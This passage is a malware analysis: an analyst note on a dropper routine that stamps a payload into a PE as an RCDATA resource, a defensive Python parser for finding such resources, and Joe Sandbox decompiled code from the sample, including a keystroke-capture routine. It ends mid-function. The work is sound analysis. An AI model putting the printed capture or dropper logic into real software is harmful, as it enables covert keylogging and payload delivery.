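Analyst note on E00477370 above: the routine opens the file named by its first argument with BeginUpdateResourceA, reads what appears to be a Delphi resource stream (E0041E0D0 with type 0xa and the name in the second argument) from the module whose handle is stored at 0x49ec78, copies it into a heap buffer, frees that module, and then writes the buffer back into the target file as an RT_RCDATA (0x0a) resource under the same name with UpdateResourceA/EndUpdateResourceA. This is the pattern of a resource-based dropper or builder: the payload is carried as RCDATA and stamped into a fresh PE rather than written as a separate file. The added example below is not code from the report or from the sample; it is a stand-alone Python parser that walks a PE's resource directory, returns its RCDATA entries (named and numbered, PE32 and PE32+) and flags blobs that start with an MZ header. The resource name "PAYLOAD", the helper names and the minimal PE built by build_sample_pe are constructed for the example, not taken from the sample.

```python
import struct

# Resource type 0x0a (RT_RCDATA): the type value passed to UpdateResourceA in E00477370.
RT_RCDATA = 10


def _parse_headers(pe):
    """Return (resource_dir_rva, [(va, vsize, raw_ptr, raw_size), ...]) for a PE32 or PE32+ image."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    (n_sections,) = struct.unpack_from("<H", pe, e_lfanew + 6)     # IMAGE_FILE_HEADER.NumberOfSections
    (size_opt,) = struct.unpack_from("<H", pe, e_lfanew + 20)      # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", pe, opt)
    datadir = opt + (96 if magic == 0x10B else 112)                # DataDirectory offset: PE32 vs PE32+
    rsrc_rva, _rsrc_size = struct.unpack_from("<II", pe, datadir + 2 * 8)  # index 2 = resource table
    sections = []
    sec = opt + size_opt
    for i in range(n_sections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, sec + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    return rsrc_rva, sections


def _rva_to_offset(sections, rva):
    """Map an RVA to a file offset through the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} is not inside any section")


def _read_name(pe, rsrc_off, field):
    """High bit set: offset to IMAGE_RESOURCE_DIR_STRING_U (WORD length + UTF-16LE chars); else a 16-bit ID."""
    if field & 0x80000000:
        off = rsrc_off + (field & 0x7FFFFFFF)
        (length,) = struct.unpack_from("<H", pe, off)
        return pe[off + 2:off + 2 + 2 * length].decode("utf-16-le")
    return field & 0xFFFF


def _walk(pe, rsrc_off, sections, dir_rel, path, out):
    """Depth-first walk of IMAGE_RESOURCE_DIRECTORY: type -> name -> language -> IMAGE_RESOURCE_DATA_ENTRY."""
    d = rsrc_off + dir_rel
    n_named, n_id = struct.unpack_from("<HH", pe, d + 12)
    for i in range(n_named + n_id):
        name_field, off_field = struct.unpack_from("<II", pe, d + 16 + 8 * i)
        name = _read_name(pe, rsrc_off, name_field)
        if off_field & 0x80000000:                       # entry points at a subdirectory
            _walk(pe, rsrc_off, sections, off_field & 0x7FFFFFFF, path + [name], out)
        else:                                            # entry points at a data entry
            data_rva, size = struct.unpack_from("<II", pe, rsrc_off + off_field)
            start = _rva_to_offset(sections, data_rva)
            out.append(tuple(path + [name]) + (pe[start:start + size],))


def extract_resources(pe, rtype=RT_RCDATA):
    """Return [(type, name, lang, data), ...] for every resource of the given type (default RCDATA)."""
    rsrc_rva, sections = _parse_headers(pe)
    if rsrc_rva == 0:
        return []
    rsrc_off = _rva_to_offset(sections, rsrc_rva)
    out = []
    _walk(pe, rsrc_off, sections, 0, [], out)
    return [r for r in out if r[0] == rtype]


def find_embedded_pe(pe):
    """RCDATA blobs that start with an MZ header: what a resource-stamping dropper typically leaves behind."""
    return [(name, lang, blob) for _t, name, lang, blob in extract_resources(pe) if blob[:2] == b"MZ"]


def build_sample_pe(res_name, payload, lang=0x409):
    """Constructed test input (not a real sample): a minimal PE32 whose only section is .rsrc,
    holding one RT_RCDATA resource with a string name, as UpdateResourceA(h, 10, name, ...) would create."""
    string_blk = struct.pack("<H", len(res_name)) + res_name.encode("utf-16-le")
    rsrc_rva = 0x1000
    data_rel = 0x58 + len(string_blk)   # root dir @0, type dir @0x18, lang dir @0x30, data entry @0x48, name @0x58
    rsrc = bytearray()
    rsrc += bytes(12) + struct.pack("<HH", 0, 1) + struct.pack("<II", RT_RCDATA, 0x80000000 | 0x18)
    rsrc += bytes(12) + struct.pack("<HH", 1, 0) + struct.pack("<II", 0x80000000 | 0x58, 0x80000000 | 0x30)
    rsrc += bytes(12) + struct.pack("<HH", 0, 1) + struct.pack("<II", lang, 0x48)
    rsrc += struct.pack("<IIII", rsrc_rva + data_rel, len(payload), 0, 0)
    rsrc += string_blk + payload
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)  # i386, 1 section, PE32 optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                # SectionAlignment, FileAlignment
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 2 * 8, rsrc_rva, len(rsrc))  # resource data directory
    raw_ptr = 0x200
    sec = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), rsrc_rva, len(rsrc), raw_ptr, 0, 0, 0, 0, 0x40000040)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec
    return headers.ljust(raw_ptr, b"\0") + bytes(rsrc)
```

For triage, run extract_resources over the submitted file and over any PE it drops; an RCDATA entry whose data begins with MZ, or whose size is close to the size of a dropped executable, is the artifact this routine would produce. The parser deliberately reads the directory tree itself rather than calling the Windows resource API, so it works on a Linux analysis box and on images that would not load.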

                                                    C-Code - Quality: 100%
                                                    			E0040CED0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				char _v273;
                                                    				char _v534;
                                                    				char _v790;
                                                    				struct _MEMORY_BASIC_INFORMATION _v820;
                                                    				char _v824;
                                                    				intOrPtr _v828;
                                                    				char _v832;
                                                    				intOrPtr _v836;
                                                    				char _v840;
                                                    				intOrPtr _v844;
                                                    				char _v848;
                                                    				char* _v852;
                                                    				char _v856;
                                                    				char _v860;
                                                    				char _v1116;
                                                    				void* __edi;
                                                    				struct HINSTANCE__* _t40;
                                                    				intOrPtr _t51;
                                                    				struct HINSTANCE__* _t53;
                                                    				void* _t69;
                                                    				void* _t73;
                                                    				intOrPtr _t74;
                                                    				intOrPtr _t83;
                                                    				intOrPtr _t86;
                                                    				intOrPtr* _t87;
                                                    				void* _t93;
                                                    
                                                    				_t93 = __fp0;
                                                    				_v8 = __ecx;
                                                    				_t73 = __edx;
                                                    				_t87 = __eax;
                                                    				VirtualQuery(__edx,  &_v820, 0x1c);
                                                    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                    					_t40 =  *0x49e668; // 0x400000
                                                    					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                    					_v12 = E0040CEC4(_t73);
                                                    				} else {
                                                    					_v12 = _t73 - _v820.AllocationBase;
                                                    				}
                                                    				L00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
                                                    				_t74 = 0x40d050;
                                                    				_t86 = 0x40d050;
                                                    				_t83 =  *0x408034; // 0x408080
                                                    				if(L00403D78(_t87, _t83) != 0) {
                                                    					_t74 = E00404E80( *((intOrPtr*)(_t87 + 4)));
                                                    					_t69 = L00409F88(_t74, 0x40d050);
                                                    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                    						_t86 = 0x40d054;
                                                    					}
                                                    				}
                                                    				_t51 =  *0x49ddfc; // 0x407dac
                                                    				_t16 = _t51 + 4; // 0xffd1
                                                    				_t53 =  *0x49e668; // 0x400000
                                                    				LoadStringA(L00405FDC(_t53),  *_t16,  &_v790, 0x100);
                                                    				L00403B3C( *_t87,  &_v1116);
                                                    				_v860 =  &_v1116;
                                                    				_v856 = 4;
                                                    				_v852 =  &_v273;
                                                    				_v848 = 6;
                                                    				_v844 = _v12;
                                                    				_v840 = 5;
                                                    				_v836 = _t74;
                                                    				_v832 = 6;
                                                    				_v828 = _t86;
                                                    				_v824 = 6;
                                                    				E0040A624(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                                    				return L00409F88(_v8, _t86);
                                                    			}
                                                    0x0040ced0
                                                    0x0040cedc
                                                    0x0040cedf
                                                    0x0040cee1
                                                    0x0040ceed
                                                    0x0040cefc
                                                    0x0040cf26
                                                    0x0040cf2c
                                                    0x0040cf38
                                                    0x0040cf3d
                                                    0x0040cf43
                                                    0x0040cf43
                                                    0x0040cf61
                                                    0x0040cf66
                                                    0x0040cf6b
                                                    0x0040cf72
                                                    0x0040cf7f
                                                    0x0040cf89
                                                    0x0040cf8d
                                                    0x0040cf94
                                                    0x0040cf9d
                                                    0x0040cf9d
                                                    0x0040cf94
                                                    0x0040cfae
                                                    0x0040cfb3
                                                    0x0040cfb7
                                                    0x0040cfc2
                                                    0x0040cfcf
                                                    0x0040cfda
                                                    0x0040cfe0
                                                    0x0040cfed
                                                    0x0040cff3
                                                    0x0040cffd
                                                    0x0040d003
                                                    0x0040d00a
                                                    0x0040d010
                                                    0x0040d017
                                                    0x0040d01d
                                                    0x0040d039
                                                    0x0040d04c

                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                    • LoadStringA.USER32 ref: 0040CFC2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                    • String ID:
                                                    • API String ID: 3990497365-0
                                                    • Opcode ID: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                    • Instruction ID: b6cc919b410ec48c376b57bdd6b10f9d41704385299fbac947e4ea08e3070186
                                                    • Opcode Fuzzy Hash: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                    • Instruction Fuzzy Hash: BE414270A002589BDB21DB69CC85BDAB7FDAB18305F0441FAA548F7282D7789F84CF59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040CECE(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				char _v273;
                                                    				char _v534;
                                                    				char _v790;
                                                    				struct _MEMORY_BASIC_INFORMATION _v820;
                                                    				char _v824;
                                                    				intOrPtr _v828;
                                                    				char _v832;
                                                    				intOrPtr _v836;
                                                    				char _v840;
                                                    				intOrPtr _v844;
                                                    				char _v848;
                                                    				char* _v852;
                                                    				char _v856;
                                                    				char _v860;
                                                    				char _v1116;
                                                    				void* __edi;
                                                    				struct HINSTANCE__* _t40;
                                                    				intOrPtr _t51;
                                                    				struct HINSTANCE__* _t53;
                                                    				void* _t69;
                                                    				void* _t74;
                                                    				intOrPtr _t75;
                                                    				intOrPtr _t85;
                                                    				intOrPtr _t89;
                                                    				intOrPtr* _t92;
                                                    				void* _t105;
                                                    
                                                    				_t105 = __fp0;
                                                    				_v8 = __ecx;
                                                    				_t74 = __edx;
                                                    				_t92 = __eax;
                                                    				VirtualQuery(__edx,  &_v820, 0x1c);
                                                    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                    					_t40 =  *0x49e668; // 0x400000
                                                    					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                    					_v12 = E0040CEC4(_t74);
                                                    				} else {
                                                    					_v12 = _t74 - _v820.AllocationBase;
                                                    				}
                                                    				L00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
                                                    				_t75 = 0x40d050;
                                                    				_t89 = 0x40d050;
                                                    				_t85 =  *0x408034; // 0x408080
                                                    				if(L00403D78(_t92, _t85) != 0) {
                                                    					_t75 = E00404E80( *((intOrPtr*)(_t92 + 4)));
                                                    					_t69 = L00409F88(_t75, 0x40d050);
                                                    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                    						_t89 = 0x40d054;
                                                    					}
                                                    				}
                                                    				_t51 =  *0x49ddfc; // 0x407dac
                                                    				_t16 = _t51 + 4; // 0xffd1
                                                    				_t53 =  *0x49e668; // 0x400000
                                                    				LoadStringA(L00405FDC(_t53),  *_t16,  &_v790, 0x100);
                                                    				L00403B3C( *_t92,  &_v1116);
                                                    				_v860 =  &_v1116;
                                                    				_v856 = 4;
                                                    				_v852 =  &_v273;
                                                    				_v848 = 6;
                                                    				_v844 = _v12;
                                                    				_v840 = 5;
                                                    				_v836 = _t75;
                                                    				_v832 = 6;
                                                    				_v828 = _t89;
                                                    				_v824 = 6;
                                                    				E0040A624(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                                                    				return L00409F88(_v8, _t89);
                                                    			}

                                                    0x0040cece
                                                    0x0040cedc
                                                    0x0040cedf
                                                    0x0040cee1
                                                    0x0040ceed
                                                    0x0040cefc
                                                    0x0040cf26
                                                    0x0040cf2c
                                                    0x0040cf38
                                                    0x0040cf3d
                                                    0x0040cf43
                                                    0x0040cf43
                                                    0x0040cf61
                                                    0x0040cf66
                                                    0x0040cf6b
                                                    0x0040cf72
                                                    0x0040cf7f
                                                    0x0040cf89
                                                    0x0040cf8d
                                                    0x0040cf94
                                                    0x0040cf9d
                                                    0x0040cf9d
                                                    0x0040cf94
                                                    0x0040cfae
                                                    0x0040cfb3
                                                    0x0040cfb7
                                                    0x0040cfc2
                                                    0x0040cfcf
                                                    0x0040cfda
                                                    0x0040cfe0
                                                    0x0040cfed
                                                    0x0040cff3
                                                    0x0040cffd
                                                    0x0040d003
                                                    0x0040d00a
                                                    0x0040d010
                                                    0x0040d017
                                                    0x0040d01d
                                                    0x0040d039
                                                    0x0040d04c

                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                    • LoadStringA.USER32 ref: 0040CFC2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                    • String ID:
                                                    • API String ID: 3990497365-0
                                                    • Opcode ID: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                    • Instruction ID: 4fe94cffe00b8ae50479b7d7830d31852d6d04f91b779ba97ffbb5203982a357
                                                    • Opcode Fuzzy Hash: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                    • Instruction Fuzzy Hash: 70415270A002589BDB21DB59CC85BDAB7FD9B18305F0441FAB548F7282D7789F88CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040E174() {
                                                    				char _v152;
                                                    				short _v410;
                                                    				signed short _t14;
                                                    				signed int _t16;
                                                    				int _t18;
                                                    				void* _t20;
                                                    				void* _t23;
                                                    				int _t24;
                                                    				int _t26;
                                                    				signed int _t30;
                                                    				signed int _t31;
                                                    				signed int _t32;
                                                    				signed int _t37;
                                                    				int* _t39;
                                                    				short* _t41;
                                                    				void* _t49;
                                                    
                                                    				 *0x49e744 = 0x409;
                                                    				 *0x49e748 = 9;
                                                    				 *0x49e74c = 1;
                                                    				_t14 = GetThreadLocale();
                                                    				if(_t14 != 0) {
                                                    					 *0x49e744 = _t14;
                                                    				}
                                                    				if(_t14 != 0) {
                                                    					 *0x49e748 = _t14 & 0x3ff;
                                                    					 *0x49e74c = (_t14 & 0x0000ffff) >> 0xa;
                                                    				}
                                                    				memcpy(0x49b134, 0x40e2c8, 8 << 2);
                                                    				if( *0x49b0ec != 2) {
                                                    					_t16 = GetSystemMetrics(0x4a);
                                                    					__eflags = _t16;
                                                    					 *0x49e751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                                    					_t18 = GetSystemMetrics(0x2a);
                                                    					__eflags = _t18;
                                                    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                                    					 *0x49e750 = _t31;
                                                    					__eflags = _t31;
                                                    					if(__eflags != 0) {
                                                    						return E0040E0FC(__eflags, _t49);
                                                    					}
                                                    				} else {
                                                    					_t20 = E0040E15C();
                                                    					if(_t20 != 0) {
                                                    						 *0x49e751 = 0;
                                                    						 *0x49e750 = 0;
                                                    						return _t20;
                                                    					}
                                                    					E0040E0FC(__eflags, _t49);
                                                    					_t37 = 0x20;
                                                    					_t23 = E00403718(0x49b134, 0x20, 0x40e2c8);
                                                    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                                    					 *0x49e750 = _t32;
                                                    					__eflags = _t32;
                                                    					if(_t32 != 0) {
                                                    						 *0x49e751 = 0;
                                                    						return _t23;
                                                    					}
                                                    					_t24 = 0x80;
                                                    					_t39 =  &_v152;
                                                    					do {
                                                    						 *_t39 = _t24;
                                                    						_t24 = _t24 + 1;
                                                    						_t39 =  &(_t39[0]);
                                                    						__eflags = _t24 - 0x100;
                                                    					} while (_t24 != 0x100);
                                                    					_t26 =  *0x49e744; // 0x409
                                                    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                                    					_t18 = 0x80;
                                                    					_t41 =  &_v410;
                                                    					while(1) {
                                                    						__eflags =  *_t41 - 2;
                                                    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                                    						 *0x49e751 = _t37;
                                                    						__eflags = _t37;
                                                    						if(_t37 != 0) {
                                                    							goto L17;
                                                    						}
                                                    						_t41 = _t41 + 2;
                                                    						_t18 = _t18 - 1;
                                                    						__eflags = _t18;
                                                    						if(_t18 != 0) {
                                                    							continue;
                                                    						} else {
                                                    							return _t18;
                                                    						}
                                                    						L18:
                                                    					}
                                                    				}
                                                    				L17:
                                                    				return _t18;
                                                    				goto L18;
                                                    			}

                                                    0x0040e180
                                                    0x0040e18a
                                                    0x0040e194
                                                    0x0040e19e
                                                    0x0040e1a5
                                                    0x0040e1a7
                                                    0x0040e1a7
                                                    0x0040e1af
                                                    0x0040e1bb
                                                    0x0040e1c7
                                                    0x0040e1c7
                                                    0x0040e1db
                                                    0x0040e1e4
                                                    0x0040e293
                                                    0x0040e298
                                                    0x0040e29d
                                                    0x0040e2a4
                                                    0x0040e2a9
                                                    0x0040e2ab
                                                    0x0040e2ae
                                                    0x0040e2b4
                                                    0x0040e2b6
                                                    0x00000000
                                                    0x0040e2be
                                                    0x0040e1ea
                                                    0x0040e1ea
                                                    0x0040e1f1
                                                    0x0040e1f3
                                                    0x0040e1fa
                                                    0x00000000
                                                    0x0040e1fa
                                                    0x0040e207
                                                    0x0040e217
                                                    0x0040e219
                                                    0x0040e21e
                                                    0x0040e221
                                                    0x0040e227
                                                    0x0040e229
                                                    0x0040e22b
                                                    0x00000000
                                                    0x0040e22b
                                                    0x0040e237
                                                    0x0040e23c
                                                    0x0040e242
                                                    0x0040e242
                                                    0x0040e244
                                                    0x0040e245
                                                    0x0040e246
                                                    0x0040e246
                                                    0x0040e262
                                                    0x0040e268
                                                    0x0040e26d
                                                    0x0040e272
                                                    0x0040e278
                                                    0x0040e278
                                                    0x0040e27c
                                                    0x0040e27f
                                                    0x0040e285
                                                    0x0040e287
                                                    0x00000000
                                                    0x00000000
                                                    0x0040e289
                                                    0x0040e28c
                                                    0x0040e28c
                                                    0x0040e28d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040e28d
                                                    0x0040e278
                                                    0x0040e2c5
                                                    0x0040e2c5
                                                    0x00000000

                                                    APIs
                                                    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040E268
                                                    • GetThreadLocale.KERNEL32 ref: 0040E19E
                                                      • Part of subcall function 0040E0FC: GetCPInfo.KERNEL32(00000000,?), ref: 0040E115
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocaleStringThreadType
                                                    • String ID:
                                                    • API String ID: 1505017576-0
                                                    • Opcode ID: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                    • Instruction ID: 1e0c14cada7a8142f74d55e3307cde86d26a5cdea6c2c893cd231fda4e8750a6
                                                    • Opcode Fuzzy Hash: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                    • Instruction Fuzzy Hash: C13124316443958AE720D7A7AC017663B99E762344F0888FFE484AB3D2EB7C4855876F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E00428D80(intOrPtr __eax, void* __edx) {
                                                    				intOrPtr _v8;
                                                    				void* __ebx;
                                                    				void* __ecx;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t59;
                                                    				struct HDC__* _t69;
                                                    				void* _t70;
                                                    				intOrPtr _t79;
                                                    				void* _t84;
                                                    				struct HPALETTE__* _t85;
                                                    				intOrPtr _t87;
                                                    				intOrPtr _t89;
                                                    
                                                    				_t87 = _t89;
                                                    				_push(_t70);
                                                    				_v8 = __eax;
                                                    				_t33 = _v8;
                                                    				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                                    					return _t33;
                                                    				} else {
                                                    					L004259F4(_v8);
                                                    					_push(_t87);
                                                    					_push(0x428e5f);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t89;
                                                    					E0042A188( *((intOrPtr*)(_v8 + 0x58)));
                                                    					E00428BFC( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                                    					E0042A288( *((intOrPtr*)(_v8 + 0x58)));
                                                    					_t69 = CreateCompatibleDC(0);
                                                    					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                                    					if(_t84 == 0) {
                                                    						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                                    					} else {
                                                    						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
                                                    					}
                                                    					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
                                                    					if(_t85 == 0) {
                                                    						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                                    					} else {
                                                    						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
                                                    						RealizePalette(_t69);
                                                    					}
                                                    					L00425CE8(_v8, _t69);
                                                    					_t59 =  *0x49b8ac; // 0x3030acc
                                                    					E0041AFE4(_t59, _t69, _t70, _v8, _t85);
                                                    					_pop(_t79);
                                                    					 *[fs:eax] = _t79;
                                                    					_push(0x428e66);
                                                    					return L00425B60(_v8);
                                                    				}
                                                    			}


                                                    APIs
                                                      • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(0049E8C8,00000000,004244A2,00000000,00424501), ref: 004259FC
                                                      • Part of subcall function 004259F4: RtlLeaveCriticalSection.KERNEL32(0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A09
                                                      • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(00000038,0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A12
                                                      • Part of subcall function 0042A288: GetDC.USER32(00000000), ref: 0042A2DE
                                                      • Part of subcall function 0042A288: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042A2F3
                                                      • Part of subcall function 0042A288: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042A2FD
                                                      • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                      • Part of subcall function 0042A288: ReleaseDC.USER32 ref: 0042A32C
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00428DD5
                                                    • SelectObject.GDI32(00000000,?), ref: 00428DEE
                                                    • SelectPalette.GDI32(00000000,?,000000FF), ref: 00428E17
                                                    • RealizePalette.GDI32(00000000), ref: 00428E23
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                    • String ID:
                                                    • API String ID: 979337279-0
                                                    • Opcode ID: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
                                                    • Instruction ID: e9c466939ba293ac9df73ed0eb373398a4389f67f4d1c2ae1c2642ffffdfa89f
                                                    • Opcode Fuzzy Hash: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
                                                    • Instruction Fuzzy Hash: D2314870B05624EFC704DB59D981D5EB7E4EF08324BA241AAF404AB362CB38EE40DB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E0047689C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                    				short _v6;
                                                    				char _v262;
                                                    				int _v268;
                                                    				char _v272;
                                                    				struct HKL__* _t25;
                                                    				struct HKL__* _t28;
                                                    				int _t30;
                                                    				void* _t45;
                                                    				unsigned int _t52;
                                                    				intOrPtr _t56;
                                                    				int _t65;
                                                    				void* _t68;
                                                    
                                                    				_v272 = 0;
                                                    				_v268 = 0;
                                                    				_t45 = __edx;
                                                    				_push(_t68);
                                                    				_push(0x47699d);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t68 + 0xfffffef4;
                                                    				 *0x49ec4c = GetKeyboardLayout(0);
                                                    				GetKeyboardState( &_v262);
                                                    				_t25 =  *0x49ec4c; // 0x0
                                                    				_t28 =  *0x49ec4c; // 0x0
                                                    				_t65 =  *(_t45 + 4);
                                                    				_t30 = ToAsciiEx(_t65, MapVirtualKeyExA(_t65, 2, _t28),  &_v262,  &_v6, 0, _t25);
                                                    				_t52 =  *(_t45 + 8);
                                                    				if((_t52 & 0x80000000) != 0) {
                                                    					if((_t52 >> 0x0000001f & 0x00000001) == 1 && _t30 < 1 &&  *0x49ec50 != 0) {
                                                    						E00404BA8();
                                                    						E00476A9C(_t45, _v272,  *(_t45 + 4));
                                                    					}
                                                    				} else {
                                                    					if(_t30 <= 0) {
                                                    						 *0x49ec50 =  *(_t45 + 4);
                                                    					} else {
                                                    						E00404BA8();
                                                    						E00476A9C(_t45, _v268,  *(_t45 + 4));
                                                    						 *0x49ec50 = 0;
                                                    					}
                                                    				}
                                                    				_pop(_t56);
                                                    				 *[fs:eax] = _t56;
                                                    				_push(0x4769a4);
                                                    				return E004049E4( &_v272, 2);
                                                    			}

                                                    APIs
                                                    • GetKeyboardLayout.USER32 ref: 004768CA
                                                    • GetKeyboardState.USER32(?,00000000,00000000,0047699D), ref: 004768DB
                                                    • MapVirtualKeyExA.USER32(?,00000002,00000000), ref: 004768FF
                                                    • ToAsciiEx.USER32(?,00000000,?,?,00000000,00000000), ref: 00476906
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Keyboard$AsciiLayoutStateVirtual
                                                    • String ID:
                                                    • API String ID: 692081290-0
                                                    • Opcode ID: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                    • Instruction ID: 89de63ba6f27cd6f45779958db8435fcd8f77a32cbffcd1c99df830e07254f94
                                                    • Opcode Fuzzy Hash: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                    • Instruction Fuzzy Hash: 9D21B1B05045049EDB10DF15CC82BEA77BAEB59310F05C4B7E988A7341DA38AD408F59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0044E7A8(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                                    				intOrPtr _v8;
